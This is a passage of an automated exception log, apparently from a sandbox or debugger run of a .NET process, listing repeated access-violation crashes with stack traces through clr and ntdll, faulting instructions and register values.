DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483544
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483552
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 38606112
1 0 0

__exception__

stacktrace:
0x7fd82c5
0x7fd81a0
0x7fd26e5
0x7fd2147
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483328
registers.edi: 33483576
registers.eax: 0
registers.ebp: 33483588
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd857a
0x7fd81a0
0x7fd26e5
0x7fd2147
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483564
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483572
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 40100848
1 0 0

__exception__

stacktrace:
0x7fd82c5
0x7fd81a0
0x7fd26fd
0x7fd2147
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483328
registers.edi: 33483576
registers.eax: 0
registers.ebp: 33483588
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd857a
0x7fd81a0
0x7fd26fd
0x7fd2147
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483564
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483572
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 41597884
1 0 0

__exception__

stacktrace:
0x7fd82c5
0x7fd81a0
0x7fd26fd
0x7fd2147
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd31f4
registers.esp: 33483328
registers.edi: 33483576
registers.eax: 0
registers.ebp: 33483588
registers.edx: 133903064
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd857a
0x7fd81a0
0x7fd26fd
0x7fd2147
0x7fd0ad5
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33483564
registers.edi: 33483820
registers.eax: 0
registers.ebp: 33483572
registers.edx: 0
registers.ebx: 33486212
registers.esi: 37937612
registers.ecx: 43094920
1 0 0

__exception__

stacktrace:
0x7fd6b28
0x7fd954f
0x7fd8d21
0x7fd0b03
0x22cc7af
0x22c6d75
0x22c6886
0x22c34ab
0x22c2f10
0x22c2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fd6b6b
registers.esp: 33484448
registers.edi: 33484728
registers.eax: 0
registers.ebp: 33484456
registers.edx: 0
registers.ebx: 33486212
registers.esi: 43634760
registers.ecx: 43641844
1 0 0

__exception__

stacktrace:
0x2207e20
0x2207d55
0x220347b
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x2207eb9
registers.esp: 34403308
registers.edi: 38320100
registers.eax: 0
registers.ebp: 34403332
registers.edx: 6244880
registers.ebx: 38320120
registers.esi: 38320920
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x2209d99
0x2209d13
0x2208eb5
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 1e
exception.instruction: mov edx, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220a014
registers.esp: 34402684
registers.edi: 38601440
registers.eax: 40507392
registers.ebp: 34402744
registers.edx: 0
registers.ebx: 38605712
registers.esi: 40507392
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x2209d99
0x2209d30
0x2208eb5
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 1e
exception.instruction: mov edx, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220a014
registers.esp: 34402684
registers.edi: 38601440
registers.eax: 38245292
registers.ebp: 34402744
registers.edx: 0
registers.ebx: 40717368
registers.esi: 38245292
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x2209d99
0x2209d30
0x2208eb5
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 1e
exception.instruction: mov edx, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220a014
registers.esp: 34402684
registers.edi: 37974060
registers.eax: 39593676
registers.ebp: 34402744
registers.edx: 0
registers.ebx: 38373636
registers.esi: 39593676
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 b5 90 89 6e 89 85 44 fe ff ff 8b d0 8d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x22090a4
registers.esp: 34402792
registers.edi: 34402992
registers.eax: 0
registers.ebp: 34403320
registers.edx: 6244880
registers.ebx: 39805904
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220ccd9
0x2209392
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f
exception.instruction: mov edx, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220cf23
registers.esp: 34402700
registers.edi: 37974060
registers.eax: 41029892
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 39809836
registers.esi: 41029892
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220ccd9
0x2209392
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f
exception.instruction: mov edx, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220cf23
registers.esp: 34402700
registers.edi: 37974060
registers.eax: 42379592
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 41159536
